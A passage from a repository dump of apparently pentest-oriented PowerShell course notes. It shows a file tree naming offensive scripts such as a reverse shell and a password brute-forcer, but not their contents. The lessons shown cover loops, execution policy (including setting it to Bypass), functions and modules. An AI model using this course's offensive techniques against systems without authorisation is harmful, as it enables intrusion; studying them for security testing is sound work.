Showing preview only (1,768K chars total). Download the full file or copy to clipboard to get everything.
Repository: d1pakda5/PowerShell-for-Pentesters
Branch: master
Commit: 7176f1025cfc
Files: 74
Total size: 1.7 MB
Directory structure:
gitextract_hail4owi/
├── .gitignore
├── 1-Course-Introduction.md
├── 10-Loop-Statements-in-Powershell.md
├── 11-Basics-of-Powershell-Scripting.md
├── 12-Functions-in-Powershell-Part-1.md
├── 13-Functions-in-Powershell-Part-2.md
├── 14-Functions-in-Powershell-Part-3.md
├── 15-Advanced-Functions-in-Powershell.md
├── 16-Advanced-Scripting-with-Powershell.md
├── 17-Module-in-Powershell-Part-1.md
├── 18-Modules-in-Powershell-Part-2.md
├── 19-Modules-in-Powershell-Part-3.md
├── 2-Introduction-to-Powershell.md
├── 20-Remoting-Part-1.md
├── 21-Remoting-Part-2.md
├── 22-Powershell-Remoting-Part-3.md
├── 23-Powershell-Remoting-Part-4.md
├── 24-Powershell-Remoting-Part-5.md
├── 25-Powershell-Remoting-Part-6.md
├── 26-Jobs-in-Powershell.md
├── 27-Using-NET-in-Powershell-Part-1.md
├── 28-Using-NET-in-Powershell-Part-2.md
├── 29-Using-NET-in-Powershell-Part-3.md
├── 3-Exploring-and-using-Cmdlets.md
├── 30-Using-NET-in-Powershell-Part-4.md
├── 31-Using-NET-in-Powershell-Part-5.md
├── 32-Using-WMI-in-Powershell-Part-1.md
├── 33-Using-WMI-in-Powershell-Part-2.md
├── 34-Using-WMI-in-Powershell-Part-3.md
├── 35-COM-and-Powershell.md
├── 36-Registry-and-Powershell-Part-1.md
├── 37-Registry-and-Powershell-Part-2.md
├── 38-Registry-and-Powershell-Part-3.md
├── 39-Pentest-Methodology.md
├── 4-Output-Formatting.md
├── 40-Recon-and-Scanning-Part-1.md
├── 41-Recon-and-Scanning-Part-2.md
├── 42-Vulnerability-Scanning-and-Analysis.md
├── 43-Bruteforce-Part-1.md
├── 44-Bruteforce-Part-2.md
├── 45-Exploitation-Executing-Scripts-on-MySQL.md
├── 46-Client-Side-Attacks-Part-1.md
├── 47-Client-Side-Attacks-Part-2.md
├── 48-Client-Side-Attacks-Part-3.md
├── 49-Client-Side-Attacks-Part-4.md
├── 5-Operators.md
├── 50-PHPMyAdmin-Part-1.md
├── 51-PHPMyAdmin-Part-2.md
├── 52-Metasploit-Part-1.md
├── 53-Metasploit-Part-2.md
├── 6-Advanced-Operators.md
├── 7-Types-in-Powershell.md
├── 8-Arrays-in-Powershell.md
├── 9-Conditional-Statements-in-Powershell.md
├── Code/
│ ├── 11/
│ │ └── HelloWorld.ps1
│ ├── 15/
│ │ └── paramatrributes.ps1
│ ├── 16/
│ │ └── Show-AdvancedScript.ps1
│ ├── 18/
│ │ ├── Check-PassTheHash.psm1
│ │ └── Show-AdvancedScript.psm1
│ ├── 19/
│ │ └── Show-AdvancedScript.psd1
│ ├── 23/
│ │ └── Search-Sensitive.ps1
│ ├── 29/
│ │ └── Invoke-SysCommands.ps1
│ ├── 30/
│ │ └── Invoke-SysCommandsDLL.ps1
│ ├── 31/
│ │ └── New-SymLink.ps1
│ ├── 35/
│ │ └── Ie-Com.ps1
│ ├── 41/
│ │ ├── Get-DefaultPage.ps1
│ │ └── ip.txt
│ ├── 42/
│ │ └── Start-AutoNmap.ps1
│ ├── 44/
│ │ └── Get-WinRMPassword.ps1
│ ├── 47/
│ │ └── mini-reverse.ps1
│ ├── 49/
│ │ └── Out-ShortcutModified.ps1
│ └── 51/
│ ├── Convert-Dll.ps1
│ └── lib_mysqludf_sys.dll_
└── README.md
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
.DS_Store
================================================
FILE: 1-Course-Introduction.md
================================================
#### 1. Course Introduction
- [Nishang](https://github.com/samratashok/nishang) ✅
Helps in using ```PowerShell``` for ```Penetration Testing```
- [Kautilya](https://github.com/samratashok/Kautilya)
Toolkit for using ```Human Interface Devices``` in ```Penetration Tests```
- Introduction to PowerShell
- Basics of PowerShell
- Scripting
- Advanced Scripting Concepts
- Modules
- Jobs
- PowerShell with .Net
- Using Windows API with PowerShell
- PowerShell and WMI
- Working with COM objects
- Interacting with the Registry
###### Uses of PowerShell
- Recon and Scanning
- Exploitation
- Brute Forcing
- Client Side Attacks
- Using existing exploitation techniques
- Porting exploits to PowerShell – When and how
- Human Interface Device
- PowerShell and Metasploit
- Running PowerShell scripts
- Using PowerShell in Metasploit exploits
- Post Exploitation
- Information Gathering and Exfiltration
- Backdoors
- Privilege Escalation
- Getting system secrets
- Post Exploitation
- Passing the hashes/credentials
- PowerShell Remoting
- WMI and WSMAN for remote command execution
- Web Shells
- Achieving Persistence
- Using PowerShell with other security tools
- Defense against PowerShell attacks
================================================
FILE: 10-Loop-Statements-in-Powershell.md
================================================
#### 10. Loop Statements in Powershell
###### Loop Statements
- while() {}
```PowerShell
PS C:\Users\Windows-32> $count = 3
PS C:\Users\Windows-32> while ( $count -ge 0 )
>> {
>> "Iteration $count"
>> $count--
>> }
>>
Iteration 3
Iteration 2
Iteration 1
Iteration 0
PS C:\Users\Windows-32>
```
- do {} while()
- do {} until()
- for(;;){}
- foreach ( in ){}
```PowerShell
PS C:\Users\Windows-32> $process = Get-Process
PS C:\Users\Windows-32> foreach ( $i in $process ) {
>> $i.Name
>> }
>>
cmd
conhost
conhost
csrss
csrss
dwm
explorer
Idle
jusched
lsass
lsm
notepad++
powershell
PresentationFontCache
python
SearchIndexer
services
smss
spoolsv
svchost
svchost
svchost
svchost
svchost
svchost
svchost
svchost
svchost
svchost
svchost
svchost
System
taskhost
VBoxService
VBoxTray
wininit
winlogon
wmpnetwk
wuauclt
PS C:\Users\Windows-32>
```
###### Loop Cmdlets
- ForEach-Object
```PowerShell
PS C:\Users\Windows-32> Get-Process | ForEach-Object {$_.Name}
cmd
conhost
conhost
csrss
csrss
dwm
explorer
Idle
jusched
lsass
lsm
notepad++
powershell
PresentationFontCache
python
SearchFilterHost
SearchIndexer
SearchProtocolHost
services
smss
spoolsv
svchost
svchost
svchost
svchost
svchost
svchost
svchost
svchost
svchost
svchost
svchost
svchost
System
taskhost
VBoxService
VBoxTray
wininit
winlogon
wmpnetwk
wuauclt
PS C:\Users\Windows-32>
```
- Where-Object
```PowerShell
PS C:\Users\Windows-32> Get-ChildItem C:\Users\Windows-32 | Where-Object { $_.Name -match "txt" }
Directory: C:\Users\Windows-32
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 7/6/2017 9:20 PM 10 text.txt
PS C:\Users\Windows-32>
```
###### Exercise
Iterate through the processes running on your computer and print the path of the executable for each process.
```PowerShell
PS C:\Users\Administrator> Get-Process | ForEach-Object {$_.Name, $_.Path}
cmd
C:\Windows\system32\cmd.exe
conhost
C:\Windows\system32\conhost.exe
conhost
C:\Windows\system32\conhost.exe
csrss
csrss
dfsrs
C:\Windows\system32\DFSRs.exe
dfssvc
C:\Windows\system32\dfssvc.exe
dns
C:\Windows\system32\dns.exe
dwm
C:\Windows\system32\dwm.exe
explorer
C:\Windows\Explorer.EXE
firefox
C:\Program Files\Mozilla Firefox\firefox.exe
firefox
C:\Program Files\Mozilla Firefox\firefox.exe
Idle
ismserv
C:\Windows\System32\ismserv.exe
lsass
C:\Windows\system32\lsass.exe
Microsoft.ActiveDirectory.WebServices
C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe
msdtc
C:\Windows\System32\msdtc.exe
notepad
C:\Windows\system32\NOTEPAD.EXE
powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
python
C:\Python27\python.exe
services
smss
spoolsv
C:\Windows\System32\spoolsv.exe
svchost
C:\Windows\system32\svchost.exe
svchost
C:\Windows\system32\svchost.exe
svchost
C:\Windows\system32\svchost.exe
svchost
C:\Windows\system32\svchost.exe
svchost
C:\Windows\system32\svchost.exe
svchost
C:\Windows\System32\svchost.exe
svchost
C:\Windows\system32\svchost.exe
svchost
C:\Windows\system32\svchost.exe
svchost
C:\Windows\system32\svchost.exe
svchost
C:\Windows\System32\svchost.exe
System
taskhostex
C:\Windows\system32\taskhostex.exe
VBoxService
C:\Windows\System32\VBoxService.exe
VBoxTray
C:\Windows\System32\VBoxTray.exe
vds
C:\Windows\System32\vds.exe
wininit
C:\Windows\system32\wininit.exe
winlogon
C:\Windows\system32\winlogon.exe
wlms
C:\Windows\system32\wlms\wlms.exe
PS C:\Users\Administrator>
```
================================================
FILE: 11-Basics-of-Powershell-Scripting.md
================================================
#### 11. Basics of Powershell Scripting
###### PowerShell Scripting
- Write, Save, Execute
- Execution Policy is ```NOT a security control```
```Powershell``` script
```PowerShell
PS C:\Users\Windows-32\Desktop> cat .\HelloWorld.ps1
"Hello World"
PS C:\Users\Windows-32\Desktop>
```
Unable to execute ```Powershell``` script because of ```ExecutionPolicy```
```PowerShell
PS C:\Users\Windows-32> cd .\Desktop
PS C:\Users\Windows-32\Desktop> .\HelloWorld.ps1
File C:\Users\Windows-32\Desktop\HelloWorld.ps1 cannot be loaded because the execution of scripts is disabled on this system. Please see "get-help about_signing" for more details.
At line:1 char:17
+ .\HelloWorld.ps1 <<<<
+ CategoryInfo : NotSpecified: (:) [], PSSecurityException
+ FullyQualifiedErrorId : RuntimeException
PS C:\Users\Windows-32\Desktop>
```
```PowerShell
PS C:\Users\Windows-32\Desktop> Get-ExecutionPolicy
Restricted
PS C:\Users\Windows-32\Desktop>
```
```PowerShell
PS C:\Users\Windows-32\Desktop> Get-Help about_Execution_Policies
TOPIC
about_Execution_Policies
SHORT DESCRIPTION
Describes the Windows PowerShell execution policies and explains
how to manage them.
LONG DESCRIPTION
Windows PowerShell execution policies let you determine the
conditions under which Windows PowerShell loads configuration files
and runs scripts.
You can set an execution policy for the local computer, for the current
user, or for a particular session. You can also use a Group Policy
setting to set execution policy for computers and users.
Execution policies for the local computer and current user are stored
in the registry. You do not need to set execution policies in your
Windows PowerShell profile. The execution policy for a particular session
is stored only in memory and is lost when the session is closed.
The execution policy is not a security system that restricts user actions.
For example, users can easily circumvent a policy by typing the script
contents at the command line when they cannot run a script. Instead, the
execution policy helps users to set basic rules and prevents them from
violating them unintentionally.
WINDOWS POWERSHELL EXECUTION POLICIES
-------------------------------------
The Windows PowerShell execution policies are as follows:
"Restricted" is the default policy.
Restricted
- Default execution policy.
- Permits individual commands, but will not run
scripts.
- Prevents running of all script files, including
formatting and configuration files (.ps1xml), module
script files (.psm1), and Windows PowerShell
profiles (.ps1).
AllSigned
- Scripts can run.
- Requires that all scripts and configuration files
be signed by a trusted publisher, including scripts
that you write on the local computer.
- Prompts you before running scripts from publishers
that you have not yet classified as trusted or
untrusted.
- Risks running unsigned scripts from sources other
than the Internet and signed, but malicious, scripts.
RemoteSigned
- Scripts can run.
- Requires a digital signature from a trusted
publisher on scripts and configuration files that
are downloaded from the Internet (including
e-mail and instant messaging programs).
- Does not require digital signatures on scripts that you have run
and that you have written on the local computer (not
downloaded from the Internet).
- Risks running signed, but malicious, scripts.
Unrestricted
- Unsigned scripts can run. (This risks running malicious
scripts.)
- Warns the user before running srcipts and configuration
files that are downloaded from the Internet.
Bypass
- Nothing is blocked and there are no warnings or
prompts.
- This execution policy is designed for configurations
in which a Windows PowerShell script is built in to a
a larger application or for configurations in which
Windows PowerShell is the foundation for a program
that has its own security model.
Undefined
- There is no execution policy set in the current scope.
- If the execution policy in all scopes is Undefined, the
effective execution policy is Restricted, which is the
default execution policy.
Note: On systems that do not distinguish Universal Naming Convention (UNC)
paths from Internet paths, scripts that are identified by a UNC path
might not be permitted to run with the RemoteSigned execution policy.
EXECUTION POLICY SCOPE
----------------------
You can set an execution policy that is effective only in a
particular scope.
The valid values for Scope are Process, CurrentUser, and
LocalMachine. LocalMachine is the default when setting an
execution policy.
The Scope values are listed in precedence order.
- Process
The execution policy affects only the current session
(the current Windows PowerShell process). The execution
policy is stored in the $PSExecutionPolicyPreference
environment variable. This value is deleted when the
session in which the policy is set is closed.
- CurrentUser
The execution policy affects only the current user. It
is stored in the HKEY_CURRENT_USER registry subkey.
- LocalMachine
The execution policy affects all users on the current
computer. It is stored in the HKEY_LOCAL_MACHINE
registry subkey.
The policy that takes precedence is effective in the current
session, even if a more restrictive policy was set at a lower
level of precedence.
For more information, see Set-ExecutionPolicy.
GET YOUR EXECUTION POLICY
------------------------------
To get the Windows PowerShell execution policy that is in
effect in the current session, use the Get-ExecutionPolicy cmdlet.
The following command gets the current execution policy:
get-executionpolicy
To get all of the execution policies that affect the current
session and displays them in precedence order, type:
get-executionpolicy -list
The result will look similar to the following sample output:
Scope ExecutionPolicy
----- ---------------
MachinePolicy Undefined
UserPolicy Undefined
Process Undefined
CurrentUser RemoteSigned
LocalMachine AllSigned
In this case, the effective execution policy is RemoteSigned
because the execution policy for the current user takes precedence
over the execution policy set for the local computer.
To get the execution policy set for a particular scope, use the
Scope parameter of Get-ExecutionPolicy.
For example, the following command gets the execution policy for
the current user scope.
get-executionpolicy -scope CurrentUser
CHANGE YOUR EXECUTION POLICY
------------------------------
To change the Windows PowerShell execution policy on your
computer, use the Set-ExecutionPolicy cmdlet.
The change is effective immediately; you do not need to restart
Windows PowerShell.
If you set the execution policy for the local computer (the default)
or the current user, the change is saved in the registry and remains
effective until you change it again.
If you set the execution policy for the current process, it is
not saved in the registry. It is retained until the current
process and any child processes are closed.
Note: In Windows Vista and later versions of Windows, to run
commands that change the execution policy for the local
computer (the default), start Windows PowerShell with the
"Run as administrator" option.
To change your execution policy, type:
Set-ExecutionPolicy <policy-name>
For example:
Set-ExecutionPolicy RemoteSigned
To set the execution policy in a particular scope, type:
Set-ExecutionPolicy <policy-name> -scope <scope>
For example:
Set-ExecutionPolicy RemoteSigned -scope CurrentUser
A command to change an execution policy can succeed but
still not change the effective execution policy.
For example, a command that sets the execution policy for
the local computer can succeed but be overridden by the
execution policy for the current user.
REMOVE YOUR EXECUTION POLICY
----------------------------
To remove the execution policy for a particular scope, set
the value of the value of the execution policy to Undefined.
For example, to remove the execution policy for all the users of
the local computer, type:
set-executionpolicy Undefined
Or, type:
set-executionpolicy Undefined -scope LocalMachine
If no execution policy is set in any scope, the effective
execution policy is Restricted, which is the default.
SET AN EXECUTION POLICY IN POWERSHELL.EXE
-----------------------------------------
You can use the ExecutionPolicy parameter of PowerShell.exe to
set an execution policy for a new Windows PowerShell session.
The policy affects only the current session and child sessions.
To set the execution policy for a new session, start Windows PowerShell
at the command line (such as Cmd.exe or Windows PowerShell), and then use
the ExecutionPolicy parameter of PowerShell.exe to set the execution
policy.
For example:
powershell.exe -executionpolicy -allsigned
The execution policy that you set is not stored in the registry.
Instead, it is stored in the $PSExecutionPolicyPreference environment
variable. The variable is deleted when you close the session in which the
policy is set.
During the session, the execution policy that is set for the session takes
precedence over an execution policy that is set in the registry for the
local computer or current user. However, it does not take precedence over
the execution policy set by using a Group Policy setting (discussed below).
USE GROUP POLICY TO MANAGE EXECUTION POLICY
-------------------------------------------
You can use the "Turn on Script Execution" Group Policy setting
to manage the execution policy of computers in your enterprise.
The Group Policy setting overrides the execution policies set in Windows
PowerShell in all scopes.
The "Turn on Script Execution" policy settings are as follows:
-- If you disable "Turn on Script Execution", scripts do not run.
This is equivalent to the "Restricted" execution policy.
-- If you enable "Turn on Script Execution", you can select an
execution policy. The Group Policy settings are equivalent to
the following execution policy settings.
Group Policy Execution Policy
------------ ----------------
Allow all scripts. Unrestricted
Allow local scripts RemoteSigned
and remote signed
scripts.
Allow only signed AllSigned
scripts.
-- If "Turn on Script Execution" is not configured, it has no
effect. The execution policy set in Windows PowerShell is
effective.
The PowerShellExecutionPolicy.adm file adds the
"Turn on Script Execution" policy to the Computer Configuration
and User Configuration nodes in Group Policy Editor in the following
paths.
For Windows XP and Windows Server 2003:
Administrative Templates\Windows Components\Windows PowerShell
For Windows Vista and later versions of Windows:
Administrative Templates\Classic Administrative Templates\
Windows Components\Windows PowerShell
Policies set in the Computer Configuration node take precedence
over policies set in the User Configuration node.
The PowerShellExecutionPolicy.adm file is available on the
Microsoft Download Center. For more information, see "Administrative
Templates for Windows PowerShell" at
http://go.microsoft.com/fwlink/?LinkId=131786.
EXECUTION POLICY PRECEDENCE
---------------------------
When determining the effective execution policy for a
session, Windows PowerShell evaluates the execution policies
in the following precedence order:
- Group Policy: Computer Configuration
- Group Policy: User Configuration
- Execution Policy: Process (or PowerShell.exe -ExecutionPolicy)
- Execution Policy: CurrentUser
- Execution Policy: LocalMachine
MANAGE SIGNED AND UNSIGNED SCRIPTS
----------------------------------
If your Windows PowerShell execution policy is RemoteSigned,
Windows PowerShell will not run unsigned scripts that are
downloaded from the Internet (including e-mail and instant
messaging programs).
You can sign the script or elect to run an unsigned script
without changing the execution policy.
For more information, see about_Signing.
SEE ALSO
Get-ExecutionPolicy
Set-ExecutionPolicy
about_Signing
"Administrative Templates for Windows PowerShell"
(http://go.microsoft.com/fwlink/?LinkId=131786)
PS C:\Users\Windows-32\Desktop>
```
In an ```Administrative``` Powershell prompt
```PowerShell
PS C:\Windows\system32> Set-ExecutionPolicy Bypass
Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose you to the security risks described in the
about_Execution_Policies help topic. Do you want to change the execution policy?
[Y] Yes [N] No [S] Suspend [?] Help (default is "Y"): Y
PS C:\Windows\system32>
```
```PowerShell
PS C:\Users\Windows-32\Desktop> .\HelloWorld.ps1
Hello World
PS C:\Users\Windows-32\Desktop>
```
================================================
FILE: 12-Functions-in-Powershell-Part-1.md
================================================
#### 12. Functions in Powershell Part 1
###### Functions
- Simple usage
```PowerShell
PS C:\Users\Windows-32\Desktop> function add { 1 + 3 }
PS C:\Users\Windows-32\Desktop> add
4
PS C:\Users\Windows-32\Desktop>
```
- Parameters of a PowerShell function.
- $args
```PowerShell
PS C:\Users\Windows-32\Desktop> function paramshow { $args }
PS C:\Users\Windows-32\Desktop> paramshow
PS C:\Users\Windows-32\Desktop> paramshow "Hi"
Hi
PS C:\Users\Windows-32\Desktop> paramshow 666
666
PS C:\Users\Windows-32\Desktop>
```
```PowerShell
PS C:\Users\Windows-32\Desktop> function paramadd { $args[0] + $args[1] }
PS C:\Users\Windows-32\Desktop> paramadd 3 7
10
PS C:\Users\Windows-32\Desktop>
```
- Declaring parameters
```PowerShell
PS C:\Users\Windows-32\Desktop> function newFunction ( $num1, $num2 ) { $num1 * $num2 }
PS C:\Users\Windows-32\Desktop> newFunction 2 6
12
PS C:\Users\Windows-32\Desktop>
```
- Positional and named parameters
```PowerShell
PS C:\Users\Windows-32\Desktop> function posfunc ($param1, $param2) { $param1 }
PS C:\Users\Windows-32\Desktop> posfunc -param1 2 -param2 4
2
PS C:\Users\Windows-32\Desktop> posfunc 2 4
2
PS C:\Users\Windows-32\Desktop> posfunc -param2 2 -param1 4
4
PS C:\Users\Windows-32\Desktop>
```
================================================
FILE: 13-Functions-in-Powershell-Part-2.md
================================================
#### 13. Functions in Powershell Part 2
- Dynamic number of Parameters
```PowerShell
PS C:\Users\Windows-32> function fixed_params ($a, $b) {
>> $a
>> $b
>> }
>>
PS C:\Users\Windows-32> fixed_params 2 4
2
4
PS C:\Users\Windows-32> fixed_params 2 4 7
2
4
PS C:\Users\Windows-32>
```
```PowerShell
PS C:\Users\Windows-32> function var_params ($a, $b) {
>> $a
>> $b
>> $args
>> }
>>
PS C:\Users\Windows-32> var_params 1 2 4 5 7
1
2
4
5
7
PS C:\Users\Windows-32>
```
- Type declaration of the Parameters
```PowerShell
PS C:\Users\Windows-32> function addInt ([int]$a, [int]$b) { $a + $b }
PS C:\Users\Windows-32> addInt 3 6
9
PS C:\Users\Windows-32>
```
- Default Values
```PowerShell
PS C:\Users\Windows-32> function default_value ($a=8, $b) {
>> $a
>> $b
>> }
>>
PS C:\Users\Windows-32> default_value
8
PS C:\Users\Windows-32> default_value 7 5
7
5
PS C:\Users\Windows-32>
```
================================================
FILE: 14-Functions-in-Powershell-Part-3.md
================================================
#### 14. Functions in Powershell Part 3
- Switch Parameters
```PowerShell
PS C:\Users\Windows-32> function switchable ($a, $b, [switch]$flip) {
>> $a + $b
>> if ($flip) { $a - $b }
>> }
>>
PS C:\Users\Windows-32> switchable 1 2
3
PS C:\Users\Windows-32> switchable 1 2 -flip
3
-1
PS C:\Users\Windows-32>
```
- Returning values
```PowerShell
PS C:\Users\Windows-32> $output = switchable 1 4
PS C:\Users\Windows-32> $output
5
PS C:\Users\Windows-32>
```
- Scope of variables and functions
```PowerShell
PS C:\Users\Windows-32> $var1 = 33
PS C:\Users\Windows-32> function fun1 ($var1 = 22) {$var1}
PS C:\Users\Windows-32> $var1
33
PS C:\Users\Windows-32> fun1
22
PS C:\Users\Windows-32> $var1
33
PS C:\Users\Windows-32>
```
- List all function
```PowerShell
PS C:\Users\Windows-32> ls function:
CommandType Name
----------- ----
Function A:
Function addInt
Function B:
Function C:
Function cd..
Function cd\
Function Clear-Host
Function D:
Function default_value
Function Disable-PSRemoting
Function E:
Function F:
Function fixed_params
Function fun1
Function G:
Function Get-Verb
Function H:
Function help
Function I:
Function ImportSystemModules
Function J:
Function K:
Function L:
Function M:
Function mkdir
Function more
Function N:
Function O:
Function P:
Function prompt
Function Q:
Function R:
Function S:
Function switchable
Function T:
Function TabExpansion
Function U:
Function V:
Function var_params
Function W:
Function X:
Function Y:
Function Z:
PS C:\Users\Windows-32>
```
###### Exercise
- Create a function which accepts name of a process or service and stops it.
```PowerShell
PS C:\Users\Windows-32> Start-Process notepad
PS C:\Users\Windows-32> function ProcessStop ($name) { Stop-Process -Name $name }
PS C:\Users\Windows-32> ProcessStop "notepad"
PS C:\Users\Windows-32>
```
- Use a switch variable in the above function to add the ability of stopping a service as well.
```PowerShell
PS C:\Windows\system32> function ProcessStop ($name1, $name2, [switch]$flip) {
>> Stop-Process -Name $name1
>> if ($flip) { Stop-Service $name2 }
>> }
>>
PS C:\Windows\system32> ProcessStop "notepad" "WwanSvc" -flip
PS C:\Windows\system32>
```
- Accept a PID parameter too. If a PID is passed to the function, attempt should be made only to stop a process.
```PowerShell
PS C:\Windows\system32> function ProcessStop ($name1, $name2, $p_id, [switch]$flip) {
>> if ($p_id) { Stop-Process $p_id }
>> else { Stop-Process -Name $name1 }
>> if ($flip) { Stop-Service $name2 }
>> }
>>
PS C:\Windows\system32>
```
```PowerShell
PS C:\Windows\system32> Start-Process notepad
PS C:\Windows\system32> Start-Process calc
PS C:\Windows\system32> Get-Process notepad
Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName
------- ------ ----- ----- ----- ------ -- -----------
56 3 920 4220 55 0.04 2868 notepad
PS C:\Windows\system32> Get-Process calc
Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName
------- ------ ----- ----- ----- ------ -- -----------
70 7 5236 9276 67 0.05 3684 calc
PS C:\Windows\system32>
```
```PowerShell
PS C:\Windows\system32> ProcessStop "calc" "" 2868
```
```PowerShell
PS C:\Windows\system32> Get-Process notepad
Get-Process : Cannot find a process with the name "notepad". Verify the process name and call the cmdlet again.
At line:1 char:12
+ Get-Process <<<< notepad
+ CategoryInfo : ObjectNotFound: (notepad:String) [Get-Process], ProcessCommandException
+ FullyQualifiedErrorId : NoProcessFoundForGivenName,Microsoft.PowerShell.Commands.GetProcessCommand
PS C:\Windows\system32>
```
```PowerShell
PS C:\Windows\system32> Get-Process calc
Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName
------- ------ ----- ----- ----- ------ -- -----------
70 7 5236 9276 67 0.05 3684 calc
PS C:\Windows\system32>
```
================================================
FILE: 15-Advanced-Functions-in-Powershell.md
================================================
#### 15. Advanced Functions in Powershell
###### Advanced Functions
- param statement
- Parameter attributes
- Mandatory
- ```ParameterSetName``` - closest to ```function overloading```
- Position
- ValueFromPipeline
- Parameter Validation
- AllowEmptyString
- AllowNull
- AllowEmptyCollection
- ValidateLength
- ValidatePattern
- ValidateSet
- ```paramatrributes.ps1```
```PowerShell
function advancedfunction
{
param (
[Parameter (Mandatory = $True, Position = 0, ValueFromPipeline = $True, ParameterSetName="ParamSet1")]
[ValidateSet(1,2,3)]
# [AllowNull()]
$a,
[Parameter (Position = 1)]
$b
)
Write-Output "a is $a"
Write-Output "b is $b"
}
```
```PowerShell
PS C:\Users\Administrator\Desktop\15> ls
Directory: C:\Users\Administrator\Desktop\15
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 7/10/2017 6:25 PM 306 paramatrributes.ps1
PS C:\Users\Administrator\Desktop\15>
```
- ```Dot Sourcing```
```PowerShell
PS C:\Users\Administrator\Desktop\15> . .\paramatrributes.ps1
```
```PowerShell
PS C:\Users\Administrator\Desktop\15> paramattributes 1 2
a is 1
b is 2
PS C:\Users\Administrator\Desktop\15>
```
```PowerShell
PS C:\Users\Administrator\Desktop\15> paramattributes -a 2 -b 6
a is 2
b is 6
PS C:\Users\Administrator\Desktop\15>
```
```PowerShell
PS C:\Users\Administrator\Desktop\15> paramattributes
cmdlet paramattributes at command pipeline position 1
Supply values for the following parameters:
a: 3
b: 4
a is 3
b is 4
PS C:\Users\Administrator\Desktop\15>
```
```PowerShell
PS C:\Users\Administrator\Desktop\15> 1 | paramattributes -b 7
a is 1
b is 7
PS C:\Users\Administrator\Desktop\15>
```
```PowerShell
PS C:\Users\Administrator\Desktop\15> paramattributes -a $null -b 6
```
================================================
FILE: 16-Advanced-Scripting-with-Powershell.md
================================================
#### 16. Advanced Scripting with Powershell
###### PowerShell Scripting
- Dot sourcing
- CmdletBinding
- Verbose Output
- Parameter Checks
- SupportsShouldProcess (```-WhatIf``` and ```-Confirm```)
- ```Show-AdvancedScript.ps1```
```Powershell
function Show-AdvancedScript
{
[CmdletBinding( SupportsShouldProcess = $True)]
param(
[Parameter()]
$FilePath
)
Write-Verbose "Deleting $FilePath"
if ($PSCmdlet.ShouldProcess("$Filepath", "Deleting file permanently"))
{
Remove-Item $FilePath
}
}
```
```Powershell
PS C:\Users\Windows10-32> C:\Users\Windows10-32\Desktop\Show-AdvancedScript.ps1
```
```Powershell
PS C:\Users\Windows10-32> Show-AdvancedScript -FilePath .\1.txt
```
```Powershell
PS C:\Users\Windows10-32> Show-AdvancedScript -FilePath .\2.txt -Verbose
VERBOSE: Deleting .\2.txt
VERBOSE: Performing the operation "Deleting file permanently" on target ".\2.txt".
PS C:\Users\Windows10-32>
```
```Powershell
PS C:\Users\Windows10-32> Show-AdvancedScript -FilePath .\3.txt -WhatIf
What if: Performing the operation "Deleting file permanently" on target ".\3.txt".
PS C:\Users\Windows10-32>
```
```Powershell
PS C:\Users\Windows10-32> Show-AdvancedScript -FilePath .\3.txt -Confirm
```
================================================
FILE: 17-Module-in-Powershell-Part-1.md
================================================
#### 17. Module in Powershell Part 1
###### Modules
- Help topic for ```module```
```PowerShell
PS C:\Users\Windows10-32> Get-Help *module*
Name Category Module Synopsis
---- -------- ------ --------
ImportSystemModules Function ...
Export-ModuleMember Cmdlet Microsoft.PowerShell.Core ...
Get-Module Cmdlet Microsoft.PowerShell.Core ...
Import-Module Cmdlet Microsoft.PowerShell.Core ...
New-Module Cmdlet Microsoft.PowerShell.Core ...
New-ModuleManifest Cmdlet Microsoft.PowerShell.Core ...
Remove-Module Cmdlet Microsoft.PowerShell.Core ...
Test-ModuleManifest Cmdlet Microsoft.PowerShell.Core ...
InModuleScope Function Pester ...
Uninstall-Module Function PowerShellGet ...
Install-Module Function PowerShellGet ...
Publish-Module Function PowerShellGet ...
Update-ModuleManifest Function PowerShellGet ...
Save-Module Function PowerShellGet ...
Update-Module Function PowerShellGet ...
Get-InstalledModule Function PowerShellGet ...
Find-Module Function PowerShellGet ...
PS C:\Users\Windows10-32>
```
- Listing Modules
```PowerShell
PS C:\Users\Windows10-32> Get-Module -ListAvailable -All
Directory: C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Test\Modules
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Manifest 1.0.1 Example2.Diagnostics
Directory: C:\Program Files\WindowsPowerShell\Modules
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Binary 0.0.0.0 Microsoft.PackageManagement
Binary 0.0.0.0 Microsoft.PackageManagement.Arch...
Binary 0.0.0.0 Microsoft.PackageManagement.Core...
Binary 0.0.0.0 Microsoft.PackageManagement.Meta...
Binary 0.0.0.0 Microsoft.PackageManagement.MsiP...
Binary 0.0.0.0 Microsoft.PackageManagement.MsuP...
Script 1.0.1 Microsoft.PowerShell.Operation.V... {Get-OperationValidation, Invoke-OperationValidation}
Script 1.0.1 Microsoft.PowerShell.Operation.V... {Get-OperationValidation, Invoke-OperationValidation}
Binary 3.0.0.0 Microsoft.PowerShell.PackageMana... {Find-Package, Get-Package, Get-PackageProvider, Get-PackageSource...}
Binary 3.0.0.0 Microsoft.PowerShell.PSReadline {Get-PSReadlineOption, Set-PSReadlineOption, Set-PSReadlineKeyHandler, Get-PSReadlineKeyHandler...}
Manifest 0.0 OperationValidationResources
Binary 1.0.0.1 PackageManagement {Find-Package, Get-Package, Get-PackageProvider, Get-PackageSource...}
Script 0.0 PackageProviderFunctions {Write-Debug, Write-Error, Write-Progress, Write-Verbose...}
Script 3.4.0 Pester {Describe, Context, It, Should...}
Script 3.4.0 Pester {Describe, Context, It, Should...}
Script 1.0.0.1 PowerShellGet {Install-Module, Find-Module, Save-Module, Update-Module...}
Script 1.0.0.1 PowerShellGet {Install-Module, Find-Module, Save-Module, Update-Module...}
Manifest 0.0 PSGet.Resource
Script 1.2 PSReadline {Get-PSReadlineKeyHandler, Set-PSReadlineKeyHandler, Remove-PSReadlineKeyHandler, Get-PSReadlineOption...}
